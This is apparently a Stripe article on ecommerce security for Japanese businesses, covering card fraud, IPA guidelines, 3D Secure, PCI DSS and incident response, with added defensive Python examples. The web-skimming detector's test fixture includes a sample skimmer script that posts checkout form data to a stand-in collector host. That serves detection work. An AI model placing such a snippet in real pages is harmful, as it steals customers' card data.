Security measures for Japanese ecommerce businesses


With the increasing popularity of online shopping and digital payments, ecommerce sites have become an indispensable part of everyday life in Japan. However, security risks—such as credit card fraud, personal information leaks, and cyberattacks—increase year by year. Many ecommerce businesses struggle to figure out how to handle these issues because of limited resources.

In this article, we explain basic security measures for ecommerce businesses in Japan and some methods for responding to fraudulent payments and information leaks.

What’s in this article?

  • Why are security measures necessary in ecommerce?
  • Common security incidents affecting ecommerce businesses
  • Security guidelines for ecommerce sites
  • Basic security measures for ecommerce sites
  • How to respond to a security threat in ecommerce
  • How can ecommerce businesses in Japan improve security?
  • How Stripe Radar can help

Why are security measures necessary in ecommerce?

As the ecommerce market expands, fraud and cyberattack methods become more sophisticated, and losses from stolen credit card data grow more serious every year. Security measures must therefore keep pace.

Measures to prevent damage from credit card fraud

According to the Japan Consumer Credit Association (JCA), credit card fraud losses in 2024 reached a record high of ¥55.5 billion, more than double the figure from five years earlier. Fraud losses are growing alongside the ecommerce market itself.

The majority of these losses (over 90%) came from the fraudulent use of stolen card numbers on ecommerce sites. The numbers are stolen through phishing emails, fake shopping sites, and intrusions into ecommerce systems. Without basic countermeasures, these losses are unlikely to fall, and the Credit Card Security Guidelines require ecommerce businesses to implement specific measures.

Protecting customers’ personal data

Ecommerce sites handle large volumes of credit card information, along with personal information such as names, addresses, telephone numbers, and email addresses. When personal information leaks, the damage is rarely limited to a single person: typically a large volume of customer records is exposed at once, causing major financial damage and harming the business's reputation.

Cardholders whose numbers are stolen could receive unexpected charges, and they are likely to feel anxious and dissatisfied about the leak itself, losing trust in the ecommerce site. Restoring that trust requires time and resources for customer support and investigation, and in the meantime the leak damages the credibility and profitability of the business as a whole.

The ongoing risk of cyberattacks

Ecommerce sites are attractive targets for cyberattacks because they are reachable at any time and hold a large amount of transaction data. A report from the Ministry of Economy, Trade and Industry (METI) highlights that unauthorized access, phishing, and payment system hacks are on the rise. In recent years, attack methods have become increasingly sophisticated. They now include automated card-number enumeration attacks (known in Japan as "credit master" attacks), in which attackers submit large numbers of guessed card numbers to a site's payment form to find valid ones, and phishing scams built with artificial intelligence (AI).

Common security incidents affecting ecommerce businesses

Many different types of security incidents can occur on ecommerce sites. Here are some common examples and their risks:

System shutdowns

This happens when the ecommerce site becomes unavailable due to a server or system failure. While the site is down, the business loses sales and customer trust, and recovery consumes staff time and money.

The Information-technology Promotion Agency (IPA) provides Security Guidelines for Building and Operating Ecommerce Sites that recommend preparing for these situations by regularly backing up data, introducing redundancies, implementing access control, and utilizing logs.

According to a survey conducted by the IPA and the Personal Information Protection Commission (PPC), the average loss in sales due to the shutdown of an ecommerce site is estimated to be ¥57 million. The average cost of responding to this kind of incident is estimated to be ¥240 million.

Website alteration

Website alteration (tampering) happens when attackers modify the site's pages, scripts, or data, typically after malware infiltrates an administrator's terminal or the web server. An ecommerce business should install antivirus software, regularly update operating systems and software, and put in place a system for detecting intrusions and unauthorized changes to the site.

According to the National Police Agency (NPA), there have been multiple reports of a crime called "web skimming," in which malicious code is embedded in a legitimate ecommerce site's payment page to capture customers' card information as they enter it.
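As an added example (not code from the original article, and not Stripe's or the NPA's), here is one way to monitor a checkout page for the kind of alteration web skimming relies on: compare each first-party script against a hash baseline recorded at deployment, allow third-party scripts only from an approved list of hosts, and flag inline scripts that read the payment form and also send data somewhere. The page HTML, script contents, hostnames, and baseline below are all constructed for this example.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed example: first-party scripts as approved at deployment (path -> content).
BASELINE_SCRIPTS = {
    "/static/checkout.js": "function pay(){ /* submit card form to the PSP */ }",
}
# Third-party scripts are allowed by host; their content changes on the vendor's schedule.
ALLOWED_SCRIPT_HOSTS = {"js.stripe.com"}

# Constructed checkout page as fetched during monitoring: a new script host has appeared
# and an inline handler posts the payment form to an outside collector.
CURRENT_HTML = """
<html><body>
<form id="payment">...</form>
<script src="/static/checkout.js"></script>
<script src="https://js.stripe.com/v3/"></script>
<script src="https://cdn.analytics.example/track.js"></script>
<script>
document.getElementById('payment').addEventListener('submit', function () {
  fetch('https://collector.invalid/c', {method: 'POST', body: new FormData(this)});
});
</script>
</body></html>
"""
# Constructed: checkout.js as currently served, with an appended exfiltration call.
CURRENT_SCRIPTS = {
    "/static/checkout.js": "function pay(){ /* submit card form to the PSP */ }"
                           "fetch('https://collector.invalid/x')",
}

SRC_RE = re.compile(r'<script[^>]*\bsrc=["\']([^"\']+)["\']', re.I)
INLINE_RE = re.compile(r'<script(?![^>]*\bsrc=)[^>]*>(.*?)</script>', re.I | re.S)
EXFIL_RE = re.compile(r'\b(fetch|XMLHttpRequest|sendBeacon|Image)\b')


def sha256(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def check_page(html, current_scripts, baseline_scripts, allowed_hosts):
    """Return (kind, detail) findings for every deviation from the approved baseline."""
    findings = []
    for src in SRC_RE.findall(html):
        host = urlparse(src).netloc
        if host:
            # external script: only hosts on the allowlist may load on the checkout page
            if host not in allowed_hosts:
                findings.append(("UNKNOWN_SCRIPT_HOST", src))
        elif src not in baseline_scripts:
            findings.append(("UNEXPECTED_FIRST_PARTY_SCRIPT", src))
        elif sha256(current_scripts.get(src, "")) != sha256(baseline_scripts[src]):
            # first-party script content no longer matches the hash recorded at deployment
            findings.append(("FIRST_PARTY_SCRIPT_MODIFIED", src))
    for body in INLINE_RE.findall(html):
        # inline code that touches the payment form and also sends data somewhere
        if "payment" in body and EXFIL_RE.search(body):
            findings.append(("INLINE_SCRIPT_EXFIL", body.strip().splitlines()[0]))
    return findings


if __name__ == "__main__":
    for kind, detail in check_page(CURRENT_HTML, CURRENT_SCRIPTS,
                                   BASELINE_SCRIPTS, ALLOWED_SCRIPT_HOSTS):
        print(kind, detail)
```

Run this from a monitoring host on a schedule against the live page (fetching the HTML and each first-party script yourself), and update the baseline only as part of a deployment. A Content Security Policy that restricts script sources and connection targets would stop the same exfiltration in the browser; the check above is the detective control that tells you the page changed.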

Unauthorized access

This occurs when a third party gains unauthorized access to administrative screens or databases and views, alters, or deletes data. The security guidelines mentioned above list key countermeasures: multifactor authentication, vulnerability assessment, access control, and login anomaly detection.

Ecommerce sites built with open source software (OSS) can be at particular risk. According to the IPA, 97% of affected ecommerce sites were built in-house, and many of these used OSS. OSS is convenient, but its vulnerabilities are public once disclosed, and attackers scan for sites that have not applied the fix. If patches are not applied promptly and correctly, an OSS-based site quickly becomes a target for unauthorized access.
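The login anomaly detection the guidelines recommend can start from the admin panel's own access log. The following is an added example, not code from the original article or from the IPA guidelines: in one pass over the log it flags a burst of failed logins from one IP, a successful login that immediately follows such a burst, and a user's first login from an IP not seen for that user before. The log format and the sample lines are constructed for the example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (not real data). Assumed format: "<ISO timestamp> <ip> <user> <OK|FAIL>".
SAMPLE_LOG = """\
2025-01-10T09:00:01 203.0.113.5 admin FAIL
2025-01-10T09:00:03 203.0.113.5 admin FAIL
2025-01-10T09:00:04 203.0.113.5 admin FAIL
2025-01-10T09:00:06 203.0.113.5 admin FAIL
2025-01-10T09:00:07 203.0.113.5 admin FAIL
2025-01-10T09:00:09 203.0.113.5 admin OK
2025-01-10T09:15:00 198.51.100.7 alice OK
2025-01-10T13:20:00 198.51.100.7 alice OK
2025-01-10T13:21:00 192.0.2.44 alice OK
"""

FAIL_THRESHOLD = 5            # failures from one IP inside WINDOW that count as a burst
WINDOW = timedelta(minutes=5)


def parse(log_text):
    for line in log_text.splitlines():
        if line.strip():
            ts, ip, user, result = line.split()
            yield datetime.fromisoformat(ts), ip, user, result


def detect(log_text):
    """Single pass over the log; returns (timestamp, alert_kind, detail) in log order."""
    alerts = []
    fails_by_ip = defaultdict(deque)   # ip -> timestamps of failures inside the window
    known_ips = defaultdict(set)       # user -> IPs from which the user has logged in before
    for ts, ip, user, result in parse(log_text):
        q = fails_by_ip[ip]
        while q and ts - q[0] > WINDOW:   # drop failures that fell out of the window
            q.popleft()
        if result == "FAIL":
            q.append(ts)
            if len(q) == FAIL_THRESHOLD:   # fire once, when the threshold is crossed
                alerts.append((ts, "BRUTE_FORCE",
                               f"{len(q)} failed logins from {ip} within {WINDOW}"))
            continue
        # a success right after a burst of failures is the classic password-guessing payoff
        if len(q) >= FAIL_THRESHOLD:
            alerts.append((ts, "SUCCESS_AFTER_BURST",
                           f"{user} logged in from {ip} after {len(q)} failures"))
        # first login from an IP not seen before for this user: review, do not auto-block
        if known_ips[user] and ip not in known_ips[user]:
            alerts.append((ts, "NEW_IP", f"{user} logged in from unseen IP {ip}"))
        known_ips[user].add(ip)
    return alerts


if __name__ == "__main__":
    for ts, kind, detail in detect(SAMPLE_LOG):
        print(ts.isoformat(), kind, detail)
```

A SUCCESS_AFTER_BURST alert on an administrative account should be treated as a probable compromise: force a password reset and session revocation, then check what the session did. NEW_IP on its own is common for legitimate staff (home, mobile, travel), which is why the example reports it rather than blocking, and why multifactor authentication on the admin panel matters more than any single log rule.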

Ransomware

In a ransomware attack, attackers encrypt systems or data and demand money in exchange for restoring them. Businesses can reduce the risk with regular backups kept offline or otherwise separated from the production network, tight restrictions on administrator privileges, and recovery drills.

According to a report by the Japan Network Security Association (JNSA), ransomware attacks have caused financial losses of ¥10 million to several hundred million. This includes small and medium-sized enterprises, with some cases reporting losses exceeding ¥100 million.

Security guidelines for ecommerce sites

The Security Guidelines for Building and Operating Ecommerce Sites published by the IPA provide specific security guidelines for safely creating and operating ecommerce sites. They are mainly intended for small and medium-sized enterprises and independent vendors.

The main guidelines are:

  • Prevent security incidents.
  • Correct design and operations vulnerabilities.
  • Provide support for nonspecialist staff.
  • Clarify responsibilities among relevant parties for both in-house and outsourced systems.

The security guidelines are more than a technical manual. Instead, they unite practical work with decision-making by emphasizing the importance of security measures as management decisions. In addition, the guidelines provide examples of causes, effects, and risks of security incidents that have occurred or could occur.

  • Cause: Content management system (CMS) vulnerabilities that lead to site tampering
    Effect and risk: Personal data, including credit card information, could be leaked

  • Cause: Leaked administration screen IDs and passwords
    Effect and risk: Third parties could view or delete confidential customer data

  • Cause: Entrusting the assessment of system configuration and vulnerabilities to contractors without educating in-house staff
    Effect and risk: When an incident occurs, the cause might not be easily identified, prolonging the incident and its impact

  • Cause: Making the development environment and test pages publicly available
    Effect and risk: Potential attackers can discover vulnerabilities, leaving the system susceptible to intrusion

  • Cause: Neglecting updates and SSL/TLS settings (outdated protocol versions, weak cipher suites, expired or misconfigured certificates)
    Effect and risk: The risk of man-in-the-middle attacks and interception of communications increases

A common root cause across these incidents is a lack of clarity about who is responsible for what, and about what needs to be protected. The guidelines divide security measures into three categories based on the parties involved in preventing incidents, and explain the role of each.

Ecommerce site operators should:

  • Decide on site creation and construction and operations policies
  • Clarify outsourcing and vendor selection, contracts, and management
  • Establish a customer information protection policy

Development and construction vendors should:

  • Design and implement systems free of known vulnerabilities
  • Perform verification and testing
  • Update and manage software

Operation and maintenance vendors should:

  • Apply security patches to servers and software on a regular basis
  • Establish log management and monitoring systems
  • Establish a response system in case of an accident

Basic security measures for ecommerce sites

For many businesses, updating and strengthening security measures can seem daunting. Start with simple steps that can be done immediately, such as strengthening passwords, enabling multifactor authentication on administrative accounts, and reviewing sharing settings, then build more robust defenses over time. Here are some specific measures ecommerce businesses should consider:

Integrate Three-Domain Secure (3D Secure) 2.0 for identity verification

3D Secure 2.0 strengthens cardholder authentication for credit card payments. By verifying the cardholder with a one-time passcode or biometrics, it can stop unauthorized payments made by someone impersonating the cardholder. Transactions authenticated through 3D Secure also shift liability for fraudulent chargebacks to the card issuer.

Compared with the static passwords of the original 3D Secure, version 2.0 supports risk-based ("frictionless") authentication that challenges only higher-risk transactions, balancing security and convenience. This has made it increasingly popular among credit card companies and payment service providers. Ecommerce sites that have not integrated 3D Secure face a greater risk of chargebacks and declined transactions, so businesses should consider adopting it early.

Compliance with Payment Card Industry Data Security Standard (PCI DSS)

PCI DSS is an international security standard for businesses that handle credit card information. It specifies detailed requirements, such as encrypting cardholder data, controlling access, and managing logs. Any business whose own systems store, process, or transmit card data is in scope and must comply in full.

Managing all of these requirements in-house is a significant burden, so many businesses use PCI DSS-compliant payment service providers that tokenize card data or host the card entry form, so that raw card numbers never reach the business's own servers. This reduces the business's PCI DSS scope while still meeting the requirements.

Implement credit card fraud detection

Fraudulent transactions are not always obvious, and businesses often discover them only after the purchase is completed and a chargeback arrives. This makes it important to have a system that detects signs of fraud in real time, before a transaction is authorized or settled. Signals that should flag a transaction as suspicious include:

  • Access from regions with a history of fraud against the business
  • Many different card numbers entered from the same Internet Protocol (IP) address in a short time (a sign of card testing)
  • Mismatch between the customer information and the cardholder name
  • Multiple high-value purchases in a short period of time

A system that automatically blocks transactions scored as high risk and holds borderline ones for manual review can prevent damage before it occurs. Because each of these signals also appears in some legitimate orders, combine signals rather than acting on one alone, and prefer review over an outright block where the evidence is weak, so that genuine customers are not turned away.
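The four signals above turned into a small rules engine, as an added example (not code from the original article and not how Stripe Radar works internally): each order is scored in one pass in time order, one signal sends it to manual review, two or more block it before authorization. The order fields, the IP-to-country lookup result, the high-risk country list, and the thresholds are all assumptions constructed for the example; in practice the thresholds come from your own chargeback history.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample orders in time order (not real data). Fields are assumptions:
# (timestamp, order_id, client_ip, ip_country, card_fingerprint, cardholder_name, customer_name, amount_jpy)
SAMPLE_ORDERS = [
    ("2025-02-01T10:00:00", "o1", "198.51.100.10", "JP", "fp_a", "Taro Yamada", "Taro Yamada", 4800),
    ("2025-02-01T10:05:00", "o2", "203.0.113.9", "JP", "fp_b", "Hanako Sato", "Hanako Sato", 120000),
    ("2025-02-01T10:06:00", "o3", "203.0.113.9", "JP", "fp_c", "Hanako Sato", "Hanako Sato", 135000),
    ("2025-02-01T10:07:30", "o4", "203.0.113.9", "JP", "fp_d", "Hanako Sato", "Hanako Sato", 110000),
    ("2025-02-01T11:00:00", "o5", "192.0.2.77", "XX", "fp_e", "John Smith", "Ken Suzuki", 98000),
]

HIGH_RISK_COUNTRIES = {"XX"}          # placeholder; derive from your own chargeback history
CARD_TEST_WINDOW = timedelta(minutes=10)
CARD_TEST_DISTINCT_CARDS = 3          # distinct cards from one IP inside the window
HIGH_VALUE_JPY = 100_000
HIGH_VALUE_WINDOW = timedelta(minutes=30)
HIGH_VALUE_COUNT = 2                  # high-value orders per customer inside the window


def normalize(name):
    return " ".join(name.lower().split())


def score_orders(orders):
    """One pass in time order; returns {order_id: (score, reasons, action)}."""
    cards_by_ip = defaultdict(deque)       # ip -> (timestamp, card_fingerprint) inside window
    high_by_customer = defaultdict(deque)  # customer -> timestamps of high-value orders
    results = {}
    for ts_s, oid, ip, country, fp, holder, customer, amount in sorted(orders):
        ts = datetime.fromisoformat(ts_s)
        reasons = []
        if country in HIGH_RISK_COUNTRIES:
            reasons.append("high-risk region")
        # card testing: many different card numbers tried from one IP in a short time
        q = cards_by_ip[ip]
        q.append((ts, fp))
        while q and ts - q[0][0] > CARD_TEST_WINDOW:
            q.popleft()
        if len({f for _, f in q}) >= CARD_TEST_DISTINCT_CARDS:
            reasons.append("multiple cards from one IP")
        if normalize(holder) != normalize(customer):
            reasons.append("cardholder/customer name mismatch")
        if amount >= HIGH_VALUE_JPY:
            h = high_by_customer[normalize(customer)]
            h.append(ts)
            while h and ts - h[0] > HIGH_VALUE_WINDOW:
                h.popleft()
            if len(h) >= HIGH_VALUE_COUNT:
                reasons.append("repeated high-value purchases")
        score = len(reasons)
        # one weak signal alone is held for review; two or more are blocked before authorization
        action = "block" if score >= 2 else "review" if score == 1 else "allow"
        results[oid] = (score, reasons, action)
    return results


if __name__ == "__main__":
    for oid, (score, reasons, action) in score_orders(SAMPLE_ORDERS).items():
        print(oid, action, score, reasons)
```

In the sample, o2 and o3 are the same customer's second and third orders from one IP; o3 is only sent to review (one signal), while o4 trips both the card-testing rule and the high-value rule and is blocked. Note that the card-testing rule keys on the card fingerprint, not the card number: the engine never needs the full PAN, which keeps it out of PCI DSS scope.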

How to respond to a security threat in ecommerce

Implementing these measures reduces the likelihood of incidents, but with fraud attempts rising, most businesses will eventually face a security incident of some kind even with countermeasures in place. Here are a few ways to respond to specific security incidents:

Virus infection or ransomware

Stop using the infected computer or server and disconnect it from the network, but do not wipe or reimage it until evidence (disk images, memory, logs) has been preserved for the investigation. Then report the incident to affected business partners and customers and to the relevant government agencies; in Japan, virus and ransomware infections should be reported to the IPA's reporting office. Proceed with the investigation and restoration work. Regular backups, kept offline or otherwise out of reach of the infected systems, minimize the damage from this kind of incident.

Data leaks

Data leaks can result from unauthorized access to networks, illegal activities by employees (internal misconduct), misdirected emails, and accidental publication on the web. If one occurs, establish what type and how much data leaked, and whether protections such as encryption and access restrictions were in place for it.

In the event of unauthorized access, immediately disconnect the affected device from the network and suspend the affected services, because personal or confidential information could still be leaking. Preserve the server and access logs before anything is changed. If credit card or account information has leaked, contact the card company so the affected cards or accounts can be suspended.

In the case of internal misconduct, restrict access to internal systems and preserve evidence, such as personal computers. If emails have been sent to the wrong recipients, contact them and request that they delete the emails. If information has been mistakenly published on the company’s website, immediately delete it or restrict access so it cannot be viewed from outside the organization.

After taking these measures, be sure to report and notify the relevant parties as needed:

  • If leaked information—such as account information—could be misused, alert the individuals and businesses affected to prevent secondary damage.
  • If personal information leaks, report this to the PPC.
  • If the cause of the information leak is criminal in nature—such as unauthorized access or internal misconduct—report the details to the police.
  • If the cause of the information leak is a computer virus or unauthorized access, report the incident to the IPA reporting office.

Next, investigate the scope, cause, and damage of the leaked information. Then, proceed with recovery efforts to prevent recurrence.

System shutdown

If a system shutdown occurs, it can be difficult to identify the cause immediately. Potential causes include hardware failure, software bugs, and security breaches such as cyberattacks. If the cause is unknown, treat the shutdown as a security incident until proven otherwise.

If there are system malfunctions, failures, shutdowns, or imminent signs that one might occur, contact the system administrator or information security officer. Depending on the situation, the responsible party could switch over or shut down the servers as necessary.

After that, contact business partners and report the incident to the relevant government agencies. If there is a virus or unauthorized access, report it to the IPA reporting office. Investigate the cause of the incident and proceed with restoration and recurrence prevention.

How can ecommerce businesses in Japan improve security?

Ecommerce security measures are important for protecting day-to-day operations. No matter the size of the business, card fraud and data leaks are always a risk that businesses must work to combat.

In recent years it has become easier to adopt measures such as 3D Secure to strengthen cardholder authentication, to follow industry standards such as PCI DSS, and to introduce fraud detection services. Remain vigilant and take proactive measures in advance: not having faced a security problem yet is no reason for complacency. Business owners should strengthen the security of their ecommerce sites to ensure the reliability, trustworthiness, and continuity of their businesses.

How Stripe Radar can help

Stripe Radar uses AI models to detect and prevent fraud, trained on data from Stripe’s global network. It continuously updates these models based on the latest fraud trends, protecting your business as fraud evolves.

Stripe also offers Radar for Fraud Teams, which allows users to add custom rules addressing fraud scenarios specific to their businesses and access advanced fraud insights.

Radar can help your business:

  • Prevent fraud losses: Stripe processes over $1 trillion in payments annually. This scale uniquely enables Radar to accurately detect and prevent fraud, saving you money.
  • Increase revenue: Radar’s AI models are trained on actual dispute data, customer information, browsing data, and more. This enables Radar to identify risky transactions and reduce false positives, boosting your revenue.
  • Save time: Radar is built into Stripe and requires zero lines of code to set up. You can also monitor your fraud performance, write rules, and more in a single platform, increasing efficiency.

Learn more about Stripe Radar, or get started today.

The content in this article is for general information and education purposes only and should not be construed as legal or tax advice. Stripe does not warrant or guarantee the accurateness, completeness, adequacy, or currency of the information in the article. You should seek the advice of a competent attorney or accountant licensed to practice in your jurisdiction for advice on your particular situation.
